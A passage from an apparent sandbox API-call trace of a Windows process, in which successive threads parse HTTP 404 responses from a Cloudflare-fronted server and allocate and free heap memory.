(HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3e8 [0310.454] GetProcessHeap () returned 0x740000 [0310.454] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3e8 | out: hHeap=0x740000) returned 1 [0310.454] GetProcessHeap () returned 0x740000 [0310.455] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 98 os_tid = 0x4f8 [0310.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0310.715] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:25 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=bT%2F908MM%2FtIYriDJbhaNzn2zFH6PjrNkd5ZcfNGdTi1ianu54QPgGwRC%2BKFDqZnV01srGfSuEHdSSxWRzJgUaIx6Pkz9pQ9ATRW6WdhalOd0rxFvdQXMT%2BSaasl%2FRg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36734ce229174-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.715] GetProcessHeap () returned 0x740000 [0310.715] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0310.715] GetProcessHeap () returned 0x740000 [0310.715] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0310.715] GetProcessHeap () returned 0x740000 [0310.716] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 99 os_tid = 0x4f4 [0311.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.022] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:25 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ftA%2BEqUa0VBYchmotMlMSjBmSecPMP26kYx1mQuQNlRxvz24ca41xzHInlbrLFFpW9IJiue7ywJYWR1AyJCjvvMznM7VuqrpvFihDJO7MqyUpBO0WaAnEv%2Bd1ilAlQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36736bccf903a-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.023] GetProcessHeap () returned 0x740000 [0311.023] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0311.023] GetProcessHeap () returned 0x740000 [0311.023] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0311.023] GetProcessHeap () returned 0x740000 [0311.023] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 100 os_tid = 0x4e4 [0311.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.275] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:26 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Fvr27leuFcODdNrEYWku%2F3GKwllfuXrxj2Kk1uhNioL0vtAUF1V%2BtOuf5JZLPruoWbEpG3x2T2gu5nax348df%2BoC0yHoLdPQosjXteeZJIfN4%2BDQy3a2fzs24%2F0cPA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367381a9991f9-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.275] GetProcessHeap () returned 0x740000 [0311.275] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0311.275] GetProcessHeap () returned 0x740000 [0311.275] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0311.275] GetProcessHeap () returned 0x740000 [0311.275] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 101 os_tid = 0x614 [0311.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0311.664] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:26 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=O6aYdCTF%2FZJwL9igzg4b7D%2BUvTrYyf27BIUFIkMqDNFqGeHR4WgzYcMcTCeJ2z7AF5u3Xhl1Zw9XYo5%2Fg2fb1rrhZQFhRJKZLgOe%2Fsh0DQKZCSte%2FImM4Wyka4%2FZgg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3673a9e56698b-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.664] GetProcessHeap () returned 0x740000 [0311.664] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3e8 [0311.664] GetProcessHeap () returned 0x740000 [0311.664] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3e8 | out: hHeap=0x740000) returned 1 [0311.664] GetProcessHeap () returned 0x740000 [0311.664] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 102 os_tid = 0x97c [0312.267] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.268] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:27 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZTECPML2g0HVEoauZ8yhGLtyqN1LFBS6FwFqtNxa24VunObnENNenL8CJIrPth9QeGe92DXblQzige%2BUjGAtNc%2Bn7CnyCLOKgf0Sd6eQxtFwrym2%2BMmwCTt8NLDCpA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3673e9d409025-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.268] GetProcessHeap () returned 0x740000 [0312.268] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0312.268] GetProcessHeap () returned 0x740000 [0312.268] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0312.268] GetProcessHeap () returned 0x740000 [0312.268] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 103 os_tid = 0xe88 [0312.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.572] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:27 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=x6qQpfofA1mXQwGZGUJhspmpr%2BLZovO5ZREo6Ag5euXawn7qji850T8BG9h4ygqx%2B2L2IfLB%2FjJHMfSEUvziZyOqINZGBrxKB7FyhFOQ4fcQbk3xRkSOcgzrKw21TA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367407f579153-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.572] GetProcessHeap () returned 0x740000 [0312.572] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0312.572] GetProcessHeap () returned 0x740000 [0312.572] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0312.572] GetProcessHeap () returned 0x740000 [0312.572] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 104 os_tid = 0x111c [0312.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0312.900] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:27 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Ojv62BBn8M81gqDupnlvLGZR2sYIZ2GG1geLX8Gti3Gv57Rjajx5yM5ubIfx34cUdT9LVWUn%2FX873t7MzrJmO%2B067Otw3iSwx5Dv28RVALnBqcIlQOPAJoZUicBjw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367420ee0913c-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.900] GetProcessHeap () returned 0x740000 [0312.900] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0312.900] GetProcessHeap () returned 0x740000 [0312.900] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0312.900] GetProcessHeap () returned 0x740000 [0312.901] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 105 os_tid = 0xf68 [0314.936] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0314.937] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:29 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=do%2Bi7b6wqOTiVtJLsPdoFDn0pOtbbkr9yQZ%2FCRzp4RU353nDSGPB%2FpfQCzkkcSgFjZCxTSHQTL102CrWdN9FhZ9v4wc0PZkkESzLlP38KoMeEvNW0gkR7Hl9Bwom4w%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3674cce6f9274-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.937] GetProcessHeap () returned 0x740000 [0314.937] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0314.938] GetProcessHeap () returned 0x740000 [0314.938] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0314.938] GetProcessHeap () returned 0x740000 [0314.938] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 106 os_tid = 0x9c0 [0315.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.393] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:30 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Pc%2BGWNj2nk9kt7hWdyPcLVQLd1RladvWdlDpuxZsVPLcVYYRa6unl2jiIyK5cMI8zV1HfZQAr%2Fk6Oguc4pJvAAdothtnaDWJ16Ps4Ja9HPFRhis5oFZ%2F7Yu%2FSzCo9A%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36751cd57927f-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.393] GetProcessHeap () returned 0x740000 [0315.393] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0315.393] GetProcessHeap () returned 0x740000 [0315.393] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0315.393] GetProcessHeap () returned 0x740000 [0315.394] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 107 os_tid = 0x958 [0315.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.671] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:30 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=Yx1ahfog%2Bs86kwumjUA9eHek2pcnH2tKRDJMAgdefrSDRS9XeKZ5%2F4AKykJ74%2BjJ4XJlyNyeLQT7dShUcXlsStSxRqiJJu4N15RLRdW4NgD6BAjbMuHo%2F%2FZojbzeqQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36753dca59034-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.671] GetProcessHeap () returned 0x740000 [0315.671] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0315.671] GetProcessHeap () returned 0x740000 [0315.671] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0315.671] GetProcessHeap () returned 0x740000 [0315.671] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 108 os_tid = 0x8c4 [0315.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0315.931] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:30 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=E%2BmszzqsKhQWVOCJmRAXqOmEAheQJy1MBuNooMrLIPNZPG2SsPp%2BA8hRZs88I9MAGaCVGtmTqNMhumK1LZ5Cr4ztYsNo4S5lf2adEtoWHewBMqPSVLZSK7jYee1law%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367553ecc9019-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0315.931] GetProcessHeap () returned 0x740000 [0315.931] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0315.931] GetProcessHeap () returned 0x740000 [0315.931] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0315.931] GetProcessHeap () returned 0x740000 [0315.932] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 109 os_tid = 0xa04 [0316.252] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.252] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:31 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=zb9C8A%2BgEAqG2rOUJeeHjSBeUPmtN1RrWSwBs2wGZAe85rhtvwhjNk%2F%2Fh2wJ605baLdvse5aaxYAprabnNn%2BH2VmxptTgRAfEsfACXq5RA0Jvmwu%2FI6CSRxEIAOK8g%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367572b1a9293-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.252] GetProcessHeap () returned 0x740000 [0316.252] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3e8 [0316.252] GetProcessHeap () returned 0x740000 [0316.252] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3e8 | out: hHeap=0x740000) returned 1 [0316.252] GetProcessHeap () returned 0x740000 [0316.253] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 110 os_tid = 0x1148 [0316.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.656] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:31 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=yvWR0WyxtWQPuTzUwvezl27Chkloz4jWBBh9rzxuGLAI4lR74wzCQn46VqQQ39CAOPqsC5RFNg4kUCQZcyRymqLxiXn4r4jirz0As8G2IW6W82r248JllWIijWhDlg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db36758ad1b6913-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.656] GetProcessHeap () returned 0x740000 [0316.656] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0316.656] GetProcessHeap () returned 0x740000 [0316.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0316.656] GetProcessHeap () returned 0x740000 [0316.656] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 111 os_tid = 0x1178 [0316.941] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0316.942] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:31 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=0Cxm5fds38XSSX3khLRjMGhFQ5zTkJ2qvdZ7t0z9kg%2BosUvp9IyWuo0vj9FEEjDsqUqvjigQx7FGi1BIAayzeeyrQtuuZcX1FdKO%2BCZM3IJhTqSc9uVX7EJtUu5zUw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3675bcec5916e-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0316.942] GetProcessHeap () returned 0x740000 [0316.942] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0316.942] GetProcessHeap () returned 0x740000 [0316.942] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0316.942] GetProcessHeap () returned 0x740000 [0316.943] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 112 os_tid = 0x114c [0317.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.283] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:32 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=9OyjqSBFWKUHniK5hB6INECDOSFcerIgwv52z3ZGQTdxgtTyfRx25Rq0r51XD1JeAKohOis5uJQ36gu4qPOeglhDO9WuFHfZTnwo61si5oiMxiaT9KIdbL69lhtA4w%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3675dafac5b32-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.283] GetProcessHeap () returned 0x740000 [0317.283] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0317.283] GetProcessHeap () returned 0x740000 [0317.284] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0317.284] GetProcessHeap () returned 0x740000 [0317.284] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 113 os_tid = 0x7c0 [0317.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.578] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:32 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=%2F%2BUU%2BFsF%2BUvPxvWQUnYA5JVzR4wj6xMHd4996%2FLHVBjJsCHys7I%2BdLns9LavCMpdLMgeqKvv8ZMUbi3oli3ttkzG1JJh8FlrozTgytAdFVmZ60mA3bwXOUsnO5CYNQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db3675f2aa4904e-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.578] GetProcessHeap () returned 0x740000 [0317.578] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3e8 [0317.578] GetProcessHeap () returned 0x740000 [0317.578] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3e8 | out: hHeap=0x740000) returned 1 [0317.578] GetProcessHeap () returned 0x740000 [0317.579] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 114 os_tid = 0x790 [0317.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.832] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:32 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=IEtFhW7mErvZV7lN5k5Zv%2FJpYdDkgzQutba2KH%2BhGivxhVOYd7ZnoqRcp56N79VjtGYFv3sP13NPw3jQNa0YVM1ByNc3BTcMhCRqfRhbHnpJOlRf5yQo5zeXhzx8Dw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367611b889153-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0317.832] GetProcessHeap () returned 0x740000 [0317.832] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0317.832] GetProcessHeap () returned 0x740000 [0317.832] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0317.832] GetProcessHeap () returned 0x740000 [0317.832] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 115 os_tid = 0xf5c [0318.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.108] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:32 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=E9XQXOHkIce6%2FmG7s715Xo5fPQ6jpoS42AwCYV4g69ikaBnlh8XCftVIog2IYrujKyBD4Dt4EnIsZDB0OF8aRPQIfZofXdMaO%2BnGbx5vOHHcX2oX5RIBVkAF0%2FBYYw%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367630c039171-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.109] GetProcessHeap () returned 0x740000 [0318.109] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0318.109] GetProcessHeap () returned 0x740000 [0318.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 [0318.109] GetProcessHeap () returned 0x740000 [0318.109] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x755058 | out: hHeap=0x740000) returned 1 Thread: id = 116 os_tid = 0xffc [0318.345] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0318.345] StrStrA (lpFirst="HTTP/1.1 404 Not Found\r\nDate: Thu, 10 Feb 2022 06:50:33 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nConnection: close\r\nStatus: 404 Not Found\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=BPc%2Fs8FFgCVhNW54S21zbZCMUODaxgj4OMIhzDP51xAV6djFcOhBVkA75Q9ZVdgwn8aYtPPROYDXfRjDVXD1X38IYN9%2B0cyskPPAfcq13bGji07vADVQMXLGLU0GUQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nNEL: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nServer: cloudflare\r\nCF-RAY: 6db367646b779064-FRA\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0318.346] GetProcessHeap () returned 0x740000 [0318.346] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x10) returned 0x75c3d0 [0318.346] GetProcessHeap () returned 0x740000 [0318.346] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c3d0 | out: hHeap=0x740000) returned 1 